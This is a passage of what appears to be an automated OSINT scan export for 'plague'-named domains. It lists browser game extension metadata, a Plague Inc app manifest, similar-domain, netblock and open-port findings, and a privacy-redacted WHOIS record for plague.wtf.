In Call of War you rewrite the course of history!", "icon": "https://lh3.googleusercontent.com/rca81fkmlP_1deL76lVVgQFDHHJXV_nrrgWrhh7fjRpGxlaiJ0LI7fDh-kcT_s0XFy4c48qzyB04TgzXqxpDlA3_=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 100, "name": "Call of War"}, "anaphblkfplenhkephgneolhnmjminjg": {"rating": 4.038013, "users": 100000, "platform": "", "short_description": "In Forge of Empires, you control the fate of your city throughout different historical periods.", "icon": "https://lh3.googleusercontent.com/o7i1oeutKe1UW8s0ECUXnCi6VplTAYUoMLQp7S9ba9f1efR1X7M7jFlgS49CclfFbMRwhHBtmDDkEyP9Yj2Az439qA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2315, "name": "Forge of Empires"}, "apkldkehnmnkbcgkjbgchjghikcggpog": {"rating": 3.2212389, "users": 20000, "platform": "", "short_description": "Online webbrowser strategy game in a post apocolypitic world. Can you keep your town save from disaster?.", "icon": "https://lh3.googleusercontent.com/0KswqoNp3hk_FgGlha8lmXu-HFJWa3qpgiYFGU3LrU-wByWj5oP-rlJwo0X06dhrE9Sp-erRV3zqs5zI0FQfNfn-R9E=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 226, "name": "The Outbreak - Webbrowser strategy game"}, "agcokacflmihcgkgjofglkhobjkheeic": {"rating": 3.8041544, "users": 30000, "platform": "", "short_description": "Destiny calls. 
Will you die a wretched slave, or stand firm as a hero?", "icon": "https://lh3.googleusercontent.com/oTY2iF97936IRTmOkZkx-MxwWIvePEvhsEp5yn8SUpkJrafBb3saf-EHkzhbLqrtfpz6bEjy=w128-h128-e365", "rating_users": 337, "name": "Sparta: War of Empires"}, "llmmanebcflnklopeacnlgkpiehfacmd": {"rating": 3.958115, "users": 20000, "platform": "", "short_description": "Build a powerful army, show no mercy, and battle enemies for earth's last remaining resources in this massive real-time strategy\u2026", "icon": "https://lh3.googleusercontent.com/4DtWVAXXT8ndzKB9YfQArB4A6w3qcTI8bQVg2Im1vRDF6Pqdg7V14P3a6MKXBcsHumlr95n88bvwfJolkQkZgiVE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 382, "name": "War Commander"}, "kkgkognjknhcgbgbeijjondlikfkgnog": {"rating": 4.0218296, "users": 60000, "platform": "", "short_description": "Build magnificent cities, forge mighty alliances, utilize the power of the gods, conquer the world!", "icon": "https://lh3.googleusercontent.com/DicNXkYIbO-QUz_W3yfBwAs7qIk53yXJIP43hOOIt99y2-daHB0rwKkYPTTv76ItPjbbDqQ77UMFV12LNg_IHPtRMNI=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 962, "name": "Grepolis"}, "jfknmahjfliijedjbhonlmjenllgjhgj": {"rating": 3.8932583, "users": 84980, "platform": "", "short_description": "Battle live players in this turn-based artillery game!", "icon": "https://lh3.googleusercontent.com/IgOZ8fb6-DdXq5c60EdLxFv51B5mUeyXdp4yqEVyGP9h3OBTY0Jpo1upRAr-DzlDW4sWSwUG=w128-h128-e365", "rating_users": 178, "name": "Territory War 3"}, "hondhndnlnmjbmlgjigpicjoijbecdgn": {"rating": 3.6326923, "users": 90000, "platform": "", "short_description": "Brutal mercenary warfare, bleeding-edge technology, no holds barred.", "icon": "https://lh3.googleusercontent.com/n-nIo0f73nDmoRGSdd4XTETH15Wu6z2dgBNH7i7xYo4-GHhA1G3IDOmUONbdG1OZhVTlg5PT7jE=w128-h128-e365", "rating_users": 520, "name": "Soldiers Inc."}}, "manifest": {"oauth2": {"scopes": [], "client_id": "133701689125-jj0hr4gb0ff4ulsbrn0uk2i4th946d4c.apps.googleusercontent.com"}, "arc_metadata": 
{"apkList": ["app-release"], "enableExternalDirectory": false, "useGoogleContactsSyncAdapter": false, "usePlayServices": ["gcm"], "orientation": "landscape", "formFactor": "fullscreen", "packageName": "com.miniclip.plagueinc", "resize": "reconfigure", "name": "com.miniclip.plagueinc"}, "name": "Plague Inc", "default_locale": "en", "icons": {"128": "icon.png", "16": "icon.png"}, "app": {"background": {"page": "app_main.html"}}, "requirements": {"3D": {"features": ["webgl"]}}, "offline_enabled": true, "version": "1342", "manifest_version": 2, "import": [{"id": "mfaihdlpglflfgpfjcifdjdjcckigekc"}], "update_url": "https://clients2.google.com/service/update2/crx", "permissions": ["gcm", {"socket": ["tcp-connect", "tcp-listen", "udp-bind", "udp-send-to", "resolve-host"]}, "unlimitedStorage", "notifications", "clipboardRead", {"fileSystem": ["write"]}, "https://clients2.google.com/", "videoCapture", "clipboardWrite", "identity.email", "alarms", "storage", "identity", "audioCapture"]}}, "extension_id": "dnejacfgfaldfjameaaaledklokkacbc"}] plague.fun 2022-12-18 00:20:46 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.me plague.fun 2022-12-18 00:08:17 Netblock Membership No RIPE 1 0 2 0 None 104.21.16.0/20 104.21.28.240 2022-12-18 00:09:11 Open TCP Port No LeakIX 0 0 2 0 None 172.67.190.129:80 172.67.190.129 2022-12-18 00:32:28 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None registrar-abuse@google.com Domain Name: plague.wtf Registry Domain ID: 91b300be317945ac9a02c110d39076e9-DONUTS Registrar WHOIS Server: whois.donuts.co Registrar URL: http://domains.google.com Updated Date: 2022-08-29T00:47:50Z Creation Date: 2020-07-15T00:47:31Z Registry Expiry Date: 2023-07-15T00:47:31Z Registrar: Google Inc. 
Registrar IANA ID: 895 Registrar Abuse Contact Email: registrar-abuse@google.com Registrar Abuse Contact Phone: +1.8772376466 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Contact Privacy Inc. Customer 7151571251 Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns-cloud-e1.googledomains.com Name Server: ns-cloud-e2.googledomains.com Name Server: ns-cloud-e3.googledomains.com Name Server: ns-cloud-e4.googledomains.com DNSSEC: signedDelegation URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:27Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. 
When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
2022-12-18 00:06:57 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None